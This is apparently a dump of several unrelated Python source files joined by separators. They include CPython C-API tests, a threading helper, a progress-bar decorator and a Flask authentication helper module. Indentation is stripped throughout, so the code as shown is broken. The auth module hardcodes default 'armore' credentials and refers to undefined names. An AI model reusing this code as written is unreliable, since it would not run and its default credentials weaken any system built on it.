self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned a result '
br'with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = err.replace(b'\r', b'').decode('ascii', 'replace')
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
def test_fatal_error(self):
expected = ('_testcapi',)
not_expected = ('sys', 'builtins', '_imp', '_thread', '_weakref',
'_io', 'marshal', '_signal', '_abc')
code = 'import _testcapi; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import threading
import sys
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue
def isScalar(x):
return not isinstance(x, (list, tuple))
def isList(x):
return isinstance(x, (list))
def asString(x):
return str(x)
def makeDict():
return {'a': 1.0, 'c': 3.0, 'b': 2.0}
def makeTuple():
return (1.0, 2.0, 3.0)
def makeIterator(x):
return iter(x)
def makeGenerator(n):
i = 0
while i < n:
yield i
i += 1
def iterateOnThread(iterable):
results = []
def iteration_worker():
for i in iterable:
results.append(i)
thread = threading.Thread(target = iteration_worker)
thread.start()
while thread.is_alive():
thread.join(0.1)
return results
def invokeOnThread(f, *args, **kwargs):
result = []
def invoke_worker():
result.append(f(*args, **kwargs))
thread = threading.Thread(target = invoke_worker)
thread.start()
while thread.is_alive():
thread.join(0.1)
return result[0]
def reflect(x):
return x
def callFunc(f, *args, **kwargs):
return f(*args, **kwargs)
def testThrowError():
throwError()
def throwError():
raise ValueError('A very specific bad thing happened')
class PythonClass(object):
FOO = 1
BAR = 2
@classmethod
def class_method(cls):
return cls.FOO
class PythonCallable(object):
FOO = 1
BAR = 2
""" Call a callable
Args:
arg1: First argument.
"""
def __call__(self, arg1):
return arg1
def create_callable():
return PythonCallable()
dict_with_callable = dict(callable = create_callable())
|
asyncprogressor.py
|
#!/usr/bin/env python3
from tqdm import tqdm
import threading, time
import diskcache as dc
from datetime import datetime
done = False
def go_progress(seconds):
global done
with tqdm(total=400, bar_format = "{l_bar}{bar}") as pbar:
for i in range(0, 401):
time.sleep(seconds * 0.0025)
if done:
break
if i < 396:
pbar.update(1)
pbar.update(400 - i - 1)
time.sleep(1)
def common(whole_key, func, *args, **kwargs):
global done
done = False
cache = dc.Cache('/tmp/ywrnvgotba/') #random
try:
(seconds, times) = cache[whole_key]
if seconds > 1:
p = threading.Thread(target=go_progress, args=((int(seconds / times)),))
p.start()
except Exception:
(seconds, times) = (0, 0)
start = datetime.now()
result = func(*args, **kwargs)
end = datetime.now()
done = True
seconds += (end - start).seconds
times += 1
cache[whole_key] = (seconds, times)
return result
def progressor(func):
def wrapper(*args, **kwargs):
whole_key = func.__name__
return common(whole_key, func, *args, **kwargs)
return wrapper
@progressor
def long_function(s):
time.sleep(s)
if __name__ == "__main__":
long_function(3)
|
common.py
|
# # # # #
# common.py
#
# Contains methods used across
# multiple backend files
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
from datetime import datetime
from subprocess import check_output
import json
import threading
import os
import re
from flask_httpauth import HTTPDigestAuth
from functools import wraps
import domains.support.models as modLib
from flask import session, request, flash, redirect, url_for, Response
auth = HTTPDigestAuth(realm="ARMORE", use_ha1_pw=True)
defaultCreds = { "armore": auth.generate_ha1("armore", "armore") }
@auth.error_handler
def secureError():
return Response('<script> window.location.replace("/welcome")</script>', 401, {'WWW-Authenticate': 'Digest realm="Login Required"'})
def notAuthorized():
flash("Not Authorized to View This Page")
if not request.referrer:
return redirect(url_for('.welcome'))
return redirect(request.referrer)
# Decorator for determining if user is authenticated and authorized to view resource
# If 'roles' is a string, resource requires AT LEAST the specified level of authorization
# if 'roles' is an array of strings, resource requires ANY of the specified levels of authorization
def secure(roles):
def wrapper(f):
@wraps(f)
@auth.login_required
def wrapped(*args, **kwargs):
if modLib.isInitialSetup():
return redirect("/admin/initialUserSetup")
if 'username' not in session:
session['username'] = auth.username()
session['role'] = modLib.getRole(session['username'])
if type(roles) is list:
if session['role'] not in roles:
return notAuthorized()
elif type(roles) is str:
if modLib.getRoleValue(session['role']) > modLib.getRoleValue(roles):
return notAuthorized()
else:
print("#### ERROR: 'roles' NOT A VALID TYPE ####")
return secureError()
return f(*args, **kwargs)
return wrapped
return wrapper
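# Illustrative usage of the decorator above (not part of the original module; the
# route, role name, and view function below are hypothetical):
#
#   @app.route("/admin/status")
#   @secure("admin")
#   def adminStatus():
#       return "ok"
#
# Passing a list instead, e.g. @secure(["admin", "operator"]), allows access only to
# users holding one of the listed roles, while a single string requires at least
# that role level.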
# Gets password from Users database. Defines function for flask-httpauth
@auth.get_password
def getPw(theUsername):
try:
if not modLib.isInitialSetup():
user = modLib.Users.query.filter_by(username = theUsername).all()
if len(user) > 0:
return user[0].pwdhash.decode('utf-8')
if modLib.isInitialSetup():
if theUsername in defaultCreds:
return defaultCreds.get(theUsername)
else:
if theUsername in getUsernames():
return userCreds.get(theUsername)
except Exception:
    pass
return None
# Flash is how Flask displays error messages to the user. These are helper functions for that
def clearFlash():
if 'flash' in session:
del session['flash']
def addToFlash(err):
if err != "":
if 'flash' in session:
session['flash'] += err + "\n"
else:
session['flash'] = err
def getCurrentTimestampAsStr():
return str(datetime.now())
def getTemplateAsString(pathToTemplate):
with open(pathToTemplate, "r") as temp:
tString = temp.read()
return tString
def getPocPhoneNumber():
return "(555) 123-4567 (Test Number Only)"
def getLocation():
return "Olympus Mons (Test Location Only)"
def getDescription():
return "Winter getaway, snowfall rare (Test Description Only)"
def getJsonStrUnformatted(inputDict):
return json.loads(json.JSONEncoder().encode(inputDict))
def getJsonStrFormatted(inputDict):
return json.dumps(getJsonStrUnformatted(inputDict), sort_keys=True, indent=4)
def monToNum(mon):
return {
'Jan': 1,
'Feb': 2,
'Mar': 3,
'Apr': 4,
'May': 5,
'Jun': 6,
'Jul': 7,
'Aug': 8,
'Sep': 9,
'Oct': 10,
'Nov': 11,
'Dec': 12,
}[mon]
def toTimestamp(mon, day, hh, mm, ss, year=None):
today = datetime.today()
if year is None:
year = today.year
if mon > today.month:
year -= 1
return datetime(year, mon, day, hh, mm, ss).timestamp()
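# Illustrative behavior of toTimestamp (the dates below are assumed examples, not
# from the original code): when called in February 2023, toTimestamp(11, 5, 12, 0, 0)
# is interpreted as 2022-11-05 12:00:00, because a month greater than the current
# month is assumed to belong to the previous year (typical for year-less log dates).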
# Runs system commands
def cmd(command, isShell=False):
if type(command) is list:
return check_output(command, shell=isShell).decode('utf-8')
else:
return check_output(command.split(' '), shell=isShell).decode('utf-8')
def timestampToPrettyDate(timestamp):
return datetime.fromtimestamp(timestamp).strftime('%Y/%m/%d %H:%M:%S')
def getFileType(theFile):
return cmd('file ' + theFile).split(': ')[1]
def startNewThread(method, args=()):
t = threading.Thread(target=method, args=args)
t.start()
def getKeysByValue(inpDict, value):
return [k for k,v in inpDict.items() if v == value]
def getFileList(theDir, recursive=False, match='.*'):
fileList = {}
for (dirpath, dirnames, filenames) in os.walk(theDir):
if dirpath == 'static/rrd' or re.match('.*Debian.*amd', dirpath) or not re.match(match, dirpath.split('/')[-1]):
continue
tempDict = {}
for filename in filenames:
tempId = {filename: {"ds": [], "cf": []}}
tempDict.update(tempId)
fileList.update({dirpath: tempDict})
if not recursive:
break
return fileList
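# Illustrative return value of getFileList (directory and file names are hypothetical):
#   {'/var/log/example': {'a.log': {'ds': [], 'cf': []},
#                         'b.log': {'ds': [], 'cf': []}}}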
# Gets file location based on supportFiles.txt
def getSupportFilePath(desiredFile, supportFilePath=None):
if supportFilePath is None:
supportFilePath = "/var/webServer/supportFiles.txt"
with open(supportFilePath, 'r') as theFile:
theFileLines = [x.rstrip() for x in theFile.readlines()]
for l in theFileLines:
if re.search("=", l):
key, value = l.split('=')
if key == desiredFile:
return value
return None
def sortOrder(array, sortBy, orderBy):
ret = []
used = {}
for i in range(1, len(array)):
j = i
while j > 0 and array[j][sortBy] < array[j-1][sortBy]:
array[j], array[j-1] = array[j-1], array[j]
j -= 1
if orderBy == "desc":
array = array[::-1]
return array
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
